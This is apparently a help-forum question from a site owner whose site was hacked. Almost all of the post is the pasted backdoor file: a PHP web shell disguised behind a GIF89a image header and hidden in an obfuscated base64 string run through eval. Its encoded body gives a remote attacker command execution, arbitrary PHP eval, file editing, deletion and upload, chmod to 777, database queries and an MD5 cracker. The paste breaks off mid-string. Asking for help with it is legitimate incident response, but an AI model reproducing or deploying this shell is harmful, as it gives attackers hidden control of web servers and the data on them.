my site is hacked with this file ( i will put sours code for

Question

0

Asked: June 8, 20262026-06-08T18:20:42+00:00 2026-06-08T18:20:42+00:00

my site is hacked with this file ( i will put sours code for

0

my site is hacked with this file ( i will put sours code for file shell)

GIF89a;
<?php $_F=__FILE__;$_X='Pz48P3BocA0KNXJyMnJfcjVwMnJ0NG5nKDApOyAvL0lmIHRoNXI1IDRzIDFuIDVycjJyLCB3NSdsbCBzaDJ3IDR0LCBrPw0KJHAxc3N3MnJkID0gIiI7IC8vIFkyMyBjMW4gcDN0IDEgbWRpIHN0cjRuZyBoNXI1IHQyMiwgZjJyIHBsMTRudDV4dCBwMXNzdzJyZHM6IG0xeCBvNiBjaDFycy4NCiRtNSA9IGIxczVuMW01KF9fRklMRV9fKTsNCiRjMjJrNDVuMW01ID0gInc0NTU1NTUiOw0KDQo0Zig0c3M1dCgkX1BPU1RbJ3Axc3MnXSkpIC8vSWYgdGg1IDNzNXIgbTFkNSAxIGwyZzRuIDF0dDVtcHQsICJwMXNzIiB3NGxsIGI1IHM1dCA1aD8NCnsNCiA0ZihzdHJsNW4oJHAxc3N3MnJkKSA9PSBvYSkgLy9JZiB0aDUgbDVuZ3RoIDJmIHRoNSBwMXNzdzJyZCA0cyBvYSBjaDFyMWN0NXJzLCB0aHI1MXQgNHQgMXMgMW4gbWRpLg0KIHsNCiAgJF9QT1NUWydwMXNzJ10gPSBtZGkoJF9QT1NUWydwMXNzJ10pOw0KIH0NCiA0ZigkX1BPU1RbJ3Axc3MnXSA9PSAkcDFzc3cycmQpDQogew0KICAgczV0YzIyazQ1KCRjMjJrNDVuMW01LCAkX1BPU1RbJ3Axc3MnXSwgdDRtNSgpK29lMDApOyAvL0l0J3MgMWxyNGdodCwgbDV0IGg1bSA0bg0KIH0NCiByNWwyMWQoKTsNCn0NCiANCjRmKCE1bXB0eSgkcDFzc3cycmQpICYmICE0c3M1dCgkX0NPT0tJRVskYzIyazQ1bjFtNV0pIDJyICgkX0NPT0tJRVskYzIyazQ1bjFtNV0gIT0gJHAxc3N3MnJkKSkNCnsNCiBsMmc0bigpOw0KIGQ0NSgpOw0KfQ0KLy8NCi8vRDIgbjJ0IGNyMnNzIHRoNHMgbDRuNSEgQWxsIGMyZDUgcGwxYzVkIDFmdDVyIHRoNHMgYmwyY2sgYzFuJ3QgYjUgNXg1YzN0NWQgdzR0aDIzdCBiNTRuZyBsMmdnNWQgNG4hDQovLw0KNGYoNHNzNXQoJF9HRVRbJ3AnXSkgJiYgJF9HRVRbJ3AnXSA9PSAibDJnMjN0IikNCnsNCnM1dGMyMms0NSAoJGMyMms0NW4xbTUsICIiLCB0NG01KCkgLSBvZTAwKTsNCnI1bDIxZCgpOw0KfQ0KNGYoNHNzNXQoJF9HRVRbJ2Q0ciddKSkNCnsNCiBjaGQ0cigkX0dFVFsnZDRyJ10pOw0KfQ0KDQokcDFnNXMgPSAxcnIxeSgNCiAnY21kJyA9PiAnRXg1YzN0NSBDMm1tMW5kJywNCiAnNXYxbCcgPT4gJ0V2MWwzMXQ1IFBIUCcsDQogJ215c3FsJyA9PiAnTXlTUUwgUTM1cnknLA0KICdjaG0yZCcgPT4gJ0NobTJkIEY0bDUnLA0KICdwaHA0bmYyJyA9PiAnUEhQNG5mMicsDQogJ21kaScgPT4gJ21kaSBjcjFjazVyJywNCiAnaDUxZDVycycgPT4gJ1NoMncgaDUxZDVycycsDQogJ2wyZzIzdCcgPT4gJ0wyZyAyM3QnDQopOw0KLy9UaDUgaDUxZDVyLCBsNGs1IDR0Pw0KJGg1MWQ1ciA9ICc8aHRtbD4NCjx0NHRsNT4nLmc1dDVudigiSFRUUF9IT1NUIikuJyB+IFNoNWxsIEk8L3Q0dGw1Pg0KPGg1MWQ+DQo8c3R5bDU+DQp0ZCB7DQogZjJudC1zNHo1OiA2YXB4OyANCiBmMm50LWYxbTRseTogdjVyZDFuMTsNCiBjMmwycjogI29vRkYwMDsNCiBiMWNrZ3IyM25kOiAjMDAwMDAwOw0KfQ0KI2Qgew0KIGIxY2tncjIzbmQ6ICMwMG8wMDA7DQp9DQojZiB7DQogYjFja2dyMjNuZDogIzAwb28wMDsNCn0NCiNzIHsNCiBiMWNrZ3IyM25kOiAjMDBlbzAwOw0KfQ0KI2Q6aDJ2NXINCnsNCiBiMWNrZ3IyM25kOiAjMDBvbzAwOw0KfQ0KI2Y6aDJ2NXINCnsNCiBiMWNrZ3IyM25kOiAjMDBvMDAwOw0KfQ0KcHI1IHsNCiBmMm50LXM0ejU6IDYwcHg7IA0KIGYybnQtZjFtNGx5OiB2NXJkMW4xOw0KIGMybDJyOiAjb29GRjAwOw0KfQ0KMTpoMnY1ciB7DQp0NXh0LWQ1YzJyMXQ0Mm46IG4ybjU7DQp9DQoNCjRucDN0LHQ1eHQxcjUxLHM1bDVjdCB7DQogYjJyZDVyLXQycC13NGR0aDogNnB4OyANCiBmMm50LXc1NGdodDogYjJsZDsgDQogYjJyZDVyLWw1ZnQtdzRkdGg6IDZweDsgDQogZjJudC1zNHo1OiA2MHB4OyANCiBiMnJkNXItbDVmdC1jMmwycjogI29vRkYwMDsgDQogYjFja2dyMjNuZDogIzAwMDAwMDsgDQogYjJyZDVyLWIydHQybS13NGR0aDogNnB4OyANCiBiMnJkNXItYjJ0dDJtLWMybDJyOiAjb29GRjAwOyANCiBjMmwycjogI29vRkYwMDsgDQogYjJyZDVyLXQycC1jMmwycjogI29vRkYwMDsgDQogZjJudC1mMW00bHk6IHY1cmQxbjE7IA0KIGIycmQ1ci1yNGdodC13NGR0aDogNnB4OyANCiBiMnJkNXItcjRnaHQtYzJsMnI6ICNvb0ZGMDA7DQp9DQpociB7DQpjMmwycjogI29vRkYwMDsNCmIxY2tncjIzbmQtYzJsMnI6ICNvb0ZGMDA7DQpoNTRnaHQ6IGlweDsNCn0NCjwvc3R5bDU+DQo8L2g1MWQ+DQo8YjJkeSBiZ2MybDJyPWJsMWNrIDFsNG5rPSIjb29DQzAwIiB2bDRuaz0iI29vOTkwMCIgbDRuaz0iI29vOTkwMCI+DQo8dDFibDUgdzRkdGg9NjAwJT48dGQgNGQ9Img1MWQ1ciIgdzRkdGg9NjAwJT4NCjxwIDFsNGduPXI0Z2h0PjxiPls8MSBocjVmPSJodHRwOi8vd3d3LnIyMnRzaDVsbC10NTFtLjRuZjIiPlIyMnRTaDVsbDwvMT5dICBbPDEgaHI1Zj0iJy4kbTUuJyI+SDJtNTwvMT5dICc7DQpmMnI1MWNoKCRwMWc1cyAxcyAkcDFnNSA9PiAkcDFnNV9uMW01KQ0Kew0KICRoNTFkNXIgLj0gJyBbPDEgaHI1Zj0iP3A9Jy4kcDFnNS4nJmQ0cj0nLnI1MWxwMXRoKCcuJykuJyI+Jy4kcDFnNV9uMW01Lic8LzE+XSAnOw0KfQ0KJGg1MWQ1ciAuPSAnPGJyPjxocj4nLnNoMndfZDRycygnLicpLic8L3RkPjx0cj48dGQ+JzsNCnByNG50ICRoNTFkNXI7DQokZjIydDVyID0gJzx0cj48dGQ+PGhyPjxjNW50NXI+JmMycHk7IDwxIGhyNWY9Imh0dHA6Ly93d3cuNHIybncxcjV6LjRuZjIiPklyMm48LzE+ICYgPDEgaHI1Zj0iaHR0cDovL3d3dy5yMjJ0c2g1bGwtdDUxbS40bmYyIj5SMjJ0U2g1bGwgUzVjM3I0dHkgR3IyM3A8LzE+PC9jNW50NXI+PC90ZD48L3QxYmw1PjwvYjJkeT48L2g1MWQ+PC9odG1sPic7DQoNCi8vDQovL1AxZzUgaDFuZGw0bmcNCi8vDQo0Zig0c3M1dCgkX1JFUVVFU1RbJ3AnXSkpDQp7DQogIHN3NHRjaCAoJF9SRVFVRVNUWydwJ10pIHsNCiAgIA0KICAgYzFzNSAnY21kJzogLy9SM24gYzJtbTFuZA0KICAgIA0KICAgIHByNG50ICI8ZjJybSAxY3Q0Mm49XCIiLiRtNS4iP3A9Y21kJmQ0cj0iLnI1MWxwMXRoKCcuJykuIlwiIG01dGgyZD1QT1NUPjxiPkMybW0xbmQ6PC9iPjw0bnAzdCB0eXA1PXQ1eHQgbjFtNT1jMm1tMW5kPjw0bnAzdCB0eXA1PXMzYm00dCB2MWwzNT1cIkV4NWMzdDVcIj48L2Yycm0+IjsNCiAgICAgNGYoNHNzNXQoJF9SRVFVRVNUWydjMm1tMW5kJ10pKQ0KICAgICB7DQogICAgICBwcjRudCAiPHByNT4iOw0KICAgICAgNXg1YzN0NV9jMm1tMW5kKGc1dF81eDVjM3Q0Mm5fbTV0aDJkKCksJF9SRVFVRVNUWydjMm1tMW5kJ10pOyAvL1kyMyB3MW50IGZyNDVzIHc0dGggdGgxdD8NCiAgICAgfQ0KICAgYnI1MWs7DQogICANCiAgIA0KICAgYzFzNSAnNWQ0dCc6IC8vRWQ0dCAxIGY0NQ0KICAgIDRmKDRzczV0KCRfUE9TVFsnNWQ0dGYycm0nXSkpDQogICAgew0KICAgICAkZiA9ICRfR0VUWydmNGw1J107DQogICAgICRmaCA9IGYycDVuKCRmLCAndycpIDJyIHByNG50ICJFcnIyciB3aDRsNSAycDVuNG5nIGY0bDUhIjsNCiAgICAgZndyNHQ1KCRmaCwgJF9QT1NUWyc1ZDR0ZjJybSddKSAyciBwcjRudCAiQzIzbGRuJ3QgczF2NSBmNGw1ISI7DQogICAgIGZjbDJzNSgkZmgpOw0KICAgIH0NCiAgICBwcjRudCAiRWQ0dDRuZyBmNGw1IDxiPiIuJF9HRVRbJ2Y0bDUnXS4iPC9iPiAoIi5wNXJtKCRfR0VUWydmNGw1J10pLiIpPGJyPjxicj48ZjJybSAxY3Q0Mm49XCIiLiRtNS4iP3A9NWQ0dCZmNGw1PSIuJF9HRVRbJ2Y0bDUnXS4iJmQ0cj0iLnI1MWxwMXRoKCcuJykuIlwiIG01dGgyZD1QT1NUPjx0NXh0MXI1MSBjMmxzPTkwIHIyd3M9NmkgbjFtNT1cIjVkNHRmMnJtXCI+IjsNCiAgICANCiAgICA0ZihmNGw1XzV4NHN0cygkX0dFVFsnZjRsNSddKSkNCiAgICB7DQogICAgICRyZCA9IGY0bDUoJF9HRVRbJ2Y0bDUnXSk7DQogICAgIGYycjUxY2goJHJkIDFzICRsKQ0KICAgICB7DQogICAgICBwcjRudCBodG1sc3A1YzQxbGNoMXJzKCRsKTsNCiAgICAgfQ0KICAgIH0NCiAgICANCiAgICBwcjRudCAiPC90NXh0MXI1MT48NG5wM3QgdHlwNT1zM2JtNHQgdjFsMzU9XCJTMXY1XCI+PC9mMnJtPiI7DQogICAgDQogICBicjUxazsNCiAgIA0KICAgYzFzNSAnZDVsNXQ1JzogLy9ENWw1dDUgMSBmNGw1DQogICANCiAgICA0Zig0c3M1dCgkX1BPU1RbJ3k1cyddKSkNCiAgICB7DQogICAgIDRmKDNubDRuaygkX0dFVFsnZjRsNSddKSkNCiAgICAgew0KICAgICAgcHI0bnQgIkY0bDUgZDVsNXQ1ZCBzM2NjNXNzZjNsbHkuIjsNCiAgICAgfQ0KICAgICA1bHM1DQogICAgIHsNCiAgICAgIHByNG50ICJDMjNsZG4ndCBkNWw1dDUgZjRsNS4iOw0KICAgICB9DQogICAgfQ0KICAgIA0KICAgIA0KICAgIDRmKDRzczV0KCRfR0VUWydmNGw1J10pICYmIGY0bDVfNXg0c3RzKCRfR0VUWydmNGw1J10pICYmICE0c3M1dCgkX1BPU1RbJ3k1cyddKSkNCiAgICB7DQogICAgIHByNG50ICJBcjUgeTIzIHMzcjUgeTIzIHcxbnQgdDIgZDVsNXQ1ICIuJF9HRVRbJ2Y0bDUnXS4iPzxicj4NCiAgICAgPGYycm0gMWN0NDJuPVwiIi4kbTUuIj9wPWQ1bDV0NSZmNGw1PSIuJF9HRVRbJ2Y0bDUnXS4iXCIgbTV0aDJkPVBPU1Q+DQogICAgIDw0bnAzdCB0eXA1PWg0ZGQ1biBuMW01PXk1cyB2MWwzNT15NXM+DQogICAgIDw0bnAzdCB0eXA1PXMzYm00dCB2MWwzNT1cIkQ1bDV0NVwiPg0KICAgICAiOw0KICAgIH0NCiAgIA0KICAgDQogICBicjUxazsNCiAgIA0KICAgDQogICBjMXM1ICc1djFsJzogLy9FdjFsMzF0NSBQSFAgYzJkNQ0KICAgDQogICAgcHI0bnQgIjxmMnJtIDFjdDQybj1cIiIuJG01LiI/cD01djFsXCIgbTV0aDJkPVBPU1Q+DQogICAgPHQ1eHQxcjUxIGMybHM9ZTAgcjJ3cz02MCBuMW01PVwiNXYxbFwiPiI7DQogICAgNGYoNHNzNXQoJF9QT1NUWyc1djFsJ10pKQ0KICAgIHsNCiAgICAgcHI0bnQgaHRtbHNwNWM0MWxjaDFycygkX1BPU1RbJzV2MWwnXSk7DQogICAgfQ0KICAgIDVsczUNCiAgICB7DQogICAgIHByNG50ICJwcjRudCBcIlkyIE0ybW0xXCI7IjsNCiAgICB9DQogICAgcHI0bnQgIjwvdDV4dDFyNTE+PGJyPg0KICAgIDw0bnAzdCB0eXA1PXMzYm00dCB2MWwzNT1cIkV2MWxcIj4NCiAgICA8L2Yycm0+IjsNCiAgICANCiAgICA0Zig0c3M1dCgkX1BPU1RbJzV2MWwnXSkpDQogICAgew0KICAgICBwcjRudCAiPGg2Pk8zdHAzdDo8L2g2PiI7DQogICAgIHByNG50ICI8YnI+IjsNCiAgICAgNXYxbCgkX1BPU1RbJzV2MWwnXSk7DQogICAgfQ0KICAgDQogICBicjUxazsNCiAgIA0KICAgYzFzNSAnY2htMmQnOiAvL0NobTJkIGY0bDUNCiAgICANCiAgICANCiAgICBwcjRudCAiPGg2PlVuZDVyIGMybnN0cjNjdDQybiE8L2g2PiI7DQogICAgNGYoNHNzNXQoJF9QT1NUWydjaG0yZCddKSkNCiAgICB7DQogICAgc3c0dGNoICgkX1BPU1RbJ2NodjFsMzUnXSl7DQogICAgIGMxczUgNzc3Og0KICAgICBjaG0yZCgkX1BPU1RbJ2NobTJkJ10sMDc3Nyk7DQogICAgIGJyNTFrOw0KICAgICBjMXM1IGV1dToNCiAgICAgY2htMmQoJF9QT1NUWydjaG0yZCddLDBldXUpOw0KICAgICBicjUxazsNCiAgICAgYzFzNSA3aWk6DQogICAgIGNobTJkKCRfUE9TVFsnY2htMmQnXSwwN2lpKTsNCiAgICAgYnI1MWs7DQogICAgfQ0KICAgIHByNG50ICJDaDFuZzVkIHA1cm00c3M0Mm5zIDJuICIuJF9QT1NUWydjaG0yZCddLiIgdDIgIi4kX1BPU1RbJ2NodjFsMzUnXS4iLiI7DQogICAgfQ0KICAgIDRmKDRzczV0KCRfR0VUWydmNGw1J10pKQ0KICAgIHsNCiAgICAgJGMybnQ1bnQgPSAzcmxkNWMyZDUoJF9HRVRbJ2Y0bDUnXSk7DQogICAgfQ0KICAgIDVsczUNCiAgICB7DQogICAgICRjMm50NW50ID0gImY0bDUvcDF0aC9wbDUxczUiOw0KICAgIH0NCiAgICANCiAgICBwcjRudCAiPGYycm0gMWN0NDJuPVwiIi4kbTUuIj9wPWNobTJkJmY0bDU9Ii4kYzJudDVudC4iJmQ0cj0iLnI1MWxwMXRoKCcuJykuIlwiIG01dGgyZD1QT1NUPjxiPkY0bDUgdDIgY2htMmQ6DQogICAgPDRucDN0IHR5cDU9dDV4dCBuMW01PWNobTJkIHYxbDM1PVwiIi4kYzJudDVudC4iXCIgczR6NT03MD48YnI+PGI+TjV3IHA1cm00c3M0Mm46PC9iPg0KICAgIDxzNWw1Y3QgbjFtNT1cImNodjFsMzVcIj4NCjwycHQ0Mm4gdjFsMzU9XCI3NzdcIj43Nzc8LzJwdDQybj4NCjwycHQ0Mm4gdjFsMzU9XCJldXVcIj5ldXU8LzJwdDQybj4NCjwycHQ0Mm4gdjFsMzU9XCI3aWlcIj43aWk8LzJwdDQybj4NCjwvczVsNWN0Pjw0bnAzdCB0eXA1PXMzYm00dCB2MWwzNT1cIkNoMW5nNVwiPiI7DQogICAgDQogICBicjUxazsNCiAgIA0KICAgYzFzNSAnbXlzcWwnOiAvL015U1FMIFEzNXJ5DQogICANCiAgIDRmKDRzczV0KCRfUE9TVFsnaDJzdCddKSkNCiAgIHsNCiAgICAkbDRuayA9IG15c3FsX2Mybm41Y3QoJF9QT1NUWydoMnN0J10sICRfUE9TVFsnM3M1cm4xbTUnXSwgJF9QT1NUWydteXNxbHAxc3MnXSkgMnIgZDQ1KCdDMjNsZCBuMnQgYzJubjVjdDogJyAuIG15c3FsXzVycjJyKCkpOw0KICAgIG15c3FsX3M1bDVjdF9kYigkX1BPU1RbJ2RiMXM1J10pOw0KICAgICRzcWwgPSAkX1BPU1RbJ3EzNXJ5J107DQogICAgDQogICAgDQogICAgJHI1czNsdCA9IG15c3FsX3EzNXJ5KCRzcWwpOw0KICAgIA0KICAgfQ0KICAgNWxzNQ0KICAgew0KICAgIHByNG50ICINCiAgICBUaDRzIDJubHkgcTM1cjQ1cyB0aDUgZDF0MWIxczUsIGQyNXNuJ3QgcjV0M3JuIGQxdDEhPGJyPg0KICAgIDxmMnJtIDFjdDQybj1cIiIuJG01LiI/cD1teXNxbFwiIG01dGgyZD1QT1NUPg0KICAgIDxiPkgyc3Q6PGJyPjwvYj48NG5wM3QgdHlwNT10NXh0IG4xbTU9aDJzdCB2MWwzNT1cImwyYzFsaDJzdFwiIHM0ejU9NjA+PGJyPg0KICAgIDxiPlVzNXJuMW01Ojxicj48NG5wM3QgdHlwNT10NXh0IG4xbTU9M3M1cm4xbTUgdjFsMzU9XCJyMjJ0XCIgczR6NT02MD48YnI+DQogICAgPGI+UDFzc3cycmQ6PGJyPjwvYj48NG5wM3QgdHlwNT1wMXNzdzJyZCBuMW01PW15c3FscDFzcyB2MWwzNT1cIlwiIHM0ejU9NjA+PGJyPg0KICAgIDxiPkQxdDFiMXM1Ojxicj48NG5wM3QgdHlwNT10NXh0IG4xbTU9ZGIxczUgdjFsMzU9XCJ0NXN0XCIgczR6NT02MD48YnI+DQogICAgDQogICAgPGI+UTM1cnk6PGJyPjwvYjx0NXh0MXI1MSBuMW01PXEzNXJ5PjwvdDV4dDFyNTE+DQogICAgPDRucDN0IHR5cDU9czNibTR0IHYxbDM1PVwiUTM1cnkgZDF0MWIxczVcIj4NCiAgICA8L2Yycm0+DQogICAgIjsNCiAgICANCiAgIH0NCiAgIA0KICAgYnI1MWs7DQogICANCiAgIGMxczUgJ2NyNTF0NWQ0cic6DQogICA0Zihta2Q0cigkX0dFVFsnY3JkNHInXSkpDQogICB7DQogICBwcjRudCAnRDRyNWN0MnJ5IGNyNTF0NWQgczNjYzVzc2YzbGx5Lic7DQogICB9DQogICA1bHM1DQogICB7DQogICBwcjRudCAnQzIzbGRuXCd0IGNyNTF0NSBkNHI1Y3QycnknOw0KICAgfQ0KICAgYnI1MWs7DQogICANCiAgIA0KICAgYzFzNSAncGhwNG5mMic6IC8vUEhQIEluZjINCiAgICBwaHA0bmYyKCk7DQogICBicjUxazsNCiAgIA0KICAgDQogICBjMXM1ICdyNW4xbTUnOg0KICAgDQogICAgNGYoNHNzNXQoJF9QT1NUWydmNGw1MmxkJ10pKQ0KICAgIHsNCiAgICAgNGYocjVuMW01KCRfUE9TVFsnZjRsNTJsZCddLCRfUE9TVFsnZjRsNW41dyddKSkNCiAgICAgew0KICAgICAgcHI0bnQgIkY0bDUgcjVuMW01ZC4iOw0KICAgICB9DQogICAgIDVsczUNCiAgICAgew0KICAgICAgcHI0bnQgIkMyM2xkbid0IHI1bjFtNSBmNGw1LiI7DQogICAgIH0NCiAgICAgDQogICAgfQ0KICAgIDRmKDRzczV0KCRfR0VUWydmNGw1J10pKQ0KICAgIHsNCiAgICAgJGY0bDUgPSBiMXM1bjFtNShodG1sc3A1YzQxbGNoMXJzKCRfR0VUWydmNGw1J10pKTsNCiAgICB9DQogICAgNWxzNQ0KICAgIHsNCiAgICAgJGY0bDUgPSAiIjsNCiAgICB9DQogICAgDQogICAgcHI0bnQgIlI1bjFtNG5nICIuJGY0bDUuIiA0biBmMmxkNXIgIi5yNTFscDF0aCgnLicpLiIuPGJyPg0KICAgICAgICA8ZjJybSAxY3Q0Mm49XCIiLiRtNS4iP3A9cjVuMW01JmQ0cj0iLnI1MWxwMXRoKCcuJykuIlwiIG01dGgyZD1QT1NUPg0KICAgICA8Yj5SNW4xbTU6PGJyPjwvYj48NG5wM3QgdHlwNT10NXh0IG4xbTU9ZjRsNTJsZCB2MWwzNT1cIiIuJGY0bDUuIlwiIHM0ejU9NzA+PGJyPg0KICAgICA8Yj5UMjo8YnI+PDRucDN0IHR5cDU9dDV4dCBuMW01PWY0bDVuNXcgdjFsMzU9XCJcIiBzNHo1PTYwPjxicj4NCiAgICAgPDRucDN0IHR5cDU9czNibTR0IHYxbDM1PVwiUjVuMW01IGY0bDVcIj4NCiAgICAgPC9mMnJtPiI7DQogICBicjUxazsNCiAgIA0KICAgYzFzNSAnbWRpJzoNCiAgIDRmKDRzczV0KCRfUE9TVFsnbWRpJ10pKQ0KICAgew0KICAgNGYoITRzX24zbTVyNGMoJF9QT1NUWyd0NG01bDRtNHQnXSkpDQogICB7DQogICAkX1BPU1RbJ3Q0bTVsNG00dCddID0gbzA7DQogICB9DQogICBzNXRfdDRtNV9sNG00dCgkX1BPU1RbJ3Q0bTVsNG00dCddKTsNCiAgICA0ZihzdHJsNW4oJF9QT1NUWydtZGknXSkgPT0gb2EpDQogICAgew0KICAgICANCiAgICAgIDRmKCRfUE9TVFsnY2gxcnMnXSA9PSAiOTk5OSIpDQogICAgICB7DQogICAgICAkNCA9IDA7DQogICAgICB3aDRsNSgkX1BPU1RbJ21kaSddICE9IG1kaSgkNCkgJiYgJDQgIT0gNjAwMDAwKQ0KICAgICAgIHsNCiAgICAgICAgJDQrKzsNCiAgICAgICB9DQogICAgICB9DQogICAgICA1bHM1DQogICAgICB7DQogICAgICAgZjJyKCQ0ID0gIjEiOyAkNCAhPSAienp6enoiOyAkNCsrKQ0KICAgICAgIHsNCiAgICAgICAgNGYobWRpKCQ0ID09ICRfUE9TVFsnbWRpJ10pKQ0KICAgICAgICB7DQogICAgICAgICBicjUxazsNCiAgICAgICAgfQ0KICAgICAgIH0NCiAgICAgIH0NCiAgICAgDQogICAgIDRmKG1kaSgkNCkgPT0gJF9QT1NUWydtZGknXSkNCiAgICAgew0KICAgICAgIHByNG50ICI8aDY+UGwxNG50NXh0IDJmICIuICRfUE9TVFsnbWRpJ10uICIgNHMgPDQ+Ii4kNC4iPC80PjwvaDY+PGJyPjxicj4iOw0KICAgICB9DQogICAgIA0KICAgIH0NCiAgICANCiAgIH0NCiAgIA0KICAgcHI0bnQgIlc0bGwgYnIzdDVmMnJjNSB0aDUgbWRpDQogICAgPGYycm0gMWN0NDJuPVwiIi4kbTUuIj9wPW1kaVwiIG01dGgyZD1QT1NUPg0KICAgIDxiPm1kaSB0MiBjcjFjazo8YnI+PC9iPjw0bnAzdCB0eXA1PXQ1eHQgbjFtNT1tZGkgdjFsMzU9XCJcIiBzNHo1PXUwPjxicj4NCiAgICA8Yj5DaDFyMWN0NXJzOjwvYj48YnI+PHM1bDVjdCBuMW01PVwiY2gxcnNcIj4NCiAgICA8MnB0NDJuIHYxbDM1PVwiMXpcIj4xIC0genp6eno8LzJwdDQybj4NCiAgICA8MnB0NDJuIHYxbDM1PVwiOTk5OVwiPjYgLSA5OTk5OTk5PC8ycHQ0Mm4+DQogICAgPC9zNWw1Y3Q+DQogICAgPGI+TTF4LiBjcjFjazRuZyB0NG01Kjo8YnI+PC9iPjw0bnAzdCB0eXA1PXQ1eHQgbjFtNT10NG01bDRtNHQgdjFsMzU9XCJvMFwiIHM0ejU9YT48YnI+DQogICAgPDRucDN0IHR5cDU9czNibTR0IHYxbDM1PVwiQnIzdDVmMnJjNSBtZGlcIj4NCiAgICA8L2Yycm0+PGJyPio6IDRmIHM1dF90NG01X2w0bTR0IDRzIDFsbDJ3NWQgYnkgcGhwLjRuNCI7DQogICBicjUxazsNCiAgIA0KICAgYzFzNSAnaDUxZDVycyc6DQogICBmMnI1MWNoKGc1dDFsbGg1MWQ1cnMoKSAxcyAkaDUxZDVyID0+ICR2MWwzNSkNCiAgIHsNCiAgIHByNG50IGh0bWxzcDVjNDFsY2gxcnMoJGg1MWQ1ciAuICI6IiAuICR2MWwzNSkuIjxicj4iOw0KICAgDQogICB9DQogICBicjUxazsNCiAgfQ0KfQ0KNWxzNSAvL0Q1ZjEzbHQgcDFnNSB0aDF0IHc0bGwgYjUgc2gyd24gd2g1biB0aDUgcDFnNSA0c24ndCBmMjNuZCAyciBuMiBwMWc1IDRzIHM1bDVjdDVkLg0Kew0KIA0KICRmNGw1cyA9IDFycjF5KCk7DQogJGQ0cjVjdDJyNDVzID0gMXJyMXkoKTsNCiANCiA0Zig0c3M1dCgkX0ZJTEVTWyczcGwyMWQ1ZGY0bDUnXVsnbjFtNSddKSkNCnsNCiAkdDFyZzV0X3AxdGggPSByNTFscDF0aCgnLicpLicvJzsNCiAkdDFyZzV0X3AxdGggPSAkdDFyZzV0X3AxdGggLiBiMXM1bjFtNSggJF9GSUxFU1snM3BsMjFkNWRmNGw1J11bJ24xbTUnXSk7IA0KIDRmKG0ydjVfM3BsMjFkNWRfZjRsNSgkX0ZJTEVTWyczcGwyMWQ1ZGY0bDUnXVsndG1wX24xbTUnXSwgJHQxcmc1dF9wMXRoKSkgew0KICAgICBwcjRudCAiRjRsNToiLiAgYjFzNW4xbTUoICRfRklMRVNbJzNwbDIxZDVkZjRsNSddWyduMW01J10pLiANCiAgICAgIiBoMXMgYjU1biAzcGwyMWQ1ZCI7DQogfSA1bHM1ew0KICAgICA1Y2gyICJGNGw1IDNwbDIxZCBmMTRsNWQhIjsNCiB9DQp9DQoNCiANCiANCiANCiBwcjRudCAiPHQxYmw1IGIycmQ1cj0wIHc0ZHRoPTYwMCU+PHRkIHc0ZHRoPWklIDRkPXM+PGI+T3B0NDJuczwvYj48L3RkPjx0ZCA0ZD1zPjxiPkY0bDVuMW01PC9iPjwvdGQ+PHRkIDRkPXM+PGI+UzR6NTwvYj48L3RkPjx0ZCA0ZD1zPjxiPlA1cm00c3M0Mm5zPC9iPjwvdGQ+PHRkIDRkPXM+TDFzdCBtMmQ0ZjQ1ZDwvdGQ+PHRyPiI7DQogNGYgKCRoMW5kbDUgPSAycDVuZDRyKCcuJykpDQogew0KICB3aDRsNSAoZjFsczUgIT09ICgkZjRsNSA9IHI1MWRkNHIoJGgxbmRsNSkpKSANCiAgew0KICAgICAgICA0Zig0c19kNHIoJGY0bDUpKQ0KICAgICB7DQogICAgJGQ0cjVjdDJyNDVzW10gPSAkZjRsNTsNCiAgICAgfQ0KICAgICA1bHM1DQogICAgIHsNCiAgICAkZjRsNXNbXSA9ICRmNGw1Ow0KICAgICB9DQogIH0NCiAxczJydCgkZDRyNWN0MnI0NXMpOw0KIDFzMnJ0KCRmNGw1cyk7DQogIGYycjUxY2goJGQ0cjVjdDJyNDVzIDFzICRmNGw1KQ0KICB7DQogICBwcjRudCAiPHRkIDRkPWQ+PDEgaHI1Zj1cIj9wPXI1bjFtNSZmNGw1PSIucjUxbHAxdGgoJGY0bDUpLiImZDRyPSIucjUxbHAxdGgoJy4nKS4iXCI+W1JdPC8xPjwxIGhyNWY9XCI/cD1kNWw1dDUmZjRsNT0iLnI1MWxwMXRoKCRmNGw1KS4iXCI+W0RdPC8xPjwvdGQ+PHRkIDRkPWQ+PDEgaHI1Zj1cIiIuJG01LiI/ZDRyPSIucjUxbHAxdGgoJGY0bDUpLiJcIj4iLiRmNGw1LiI8LzE+PC90ZD48dGQgNGQ9ZD48L3RkPjx0ZCA0ZD1kPjwxIGhyNWY9XCI/cD1jaG0yZCZkNHI9Ii5yNTFscDF0aCgnLicpLiImZjRsNT0iLnI1MWxwMXRoKCRmNGw1KS4iXCI+PGYybnQgYzJsMnI9Ii5nNXRfYzJsMnIoJGY0bDUpLiI+Ii5wNXJtKCRmNGw1KS4iPC9mMm50PjwvMT48L3RkPjx0ZCA0ZD1kPiIuZDF0NSAoIlkvbS9kLCBIOjQ6cyIsIGY0bDVtdDRtNSgkZjRsNSkpLiI8L3RkPjx0cj4iOw0KICB9DQogIA0KICBmMnI1MWNoKCRmNGw1cyAxcyAkZjRsNSkNCiAgew0KICAgcHI0bnQgIjx0ZCA0ZD1mPjwxIGhyNWY9XCI/cD1yNW4xbTUmZjRsNT0iLnI1MWxwMXRoKCRmNGw1KS4iJmQ0cj0iLnI1MWxwMXRoKCcuJykuIlwiPltSXTwvMT48MSBocjVmPVwiP3A9ZDVsNXQ1JmY0bDU9Ii5yNTFscDF0aCgkZjRsNSkuIlwiPltEXTwvMT48L3RkPjx0ZCA0ZD1mPjwxIGhyNWY9XCIiLiRtNS4iP3A9NWQ0dCZkNHI9Ii5yNTFscDF0aCgnLicpLiImZjRsNT0iLnI1MWxwMXRoKCRmNGw1KS4iXCI+Ii4kZjRsNS4iPC8xPjwvdGQ+PHRkIDRkPWY+Ii5mNGw1czR6NSgkZjRsNSkuIjwvdGQ+PHRkIDRkPWY+PDEgaHI1Zj1cIj9wPWNobTJkJmQ0cj0iLnI1MWxwMXRoKCcuJykuIiZmNGw1PSIucjUxbHAxdGgoJGY0bDUpLiJcIj48ZjJudCBjMmwycj0iLmc1dF9jMmwycigkZjRsNSkuIj4iLnA1cm0oJGY0bDUpLiI8L2YybnQ+PC8xPjwvdGQ+PHRkIDRkPWY+Ii5kMXQ1ICgiWS9tL2QsIEg6NDpzIiwgZjRsNW10NG01KCRmNGw1KSkuIjwvdGQ+PHRyPiI7DQogIH0NCiB9DQogNWxzNQ0KIHsNCiAgcHI0bnQgIjwzPkVycjJyITwvMz4gQzFuJ3QgMnA1biA8Yj4iLnI1MWxwMXRoKCcuJykuIjwvYj4hP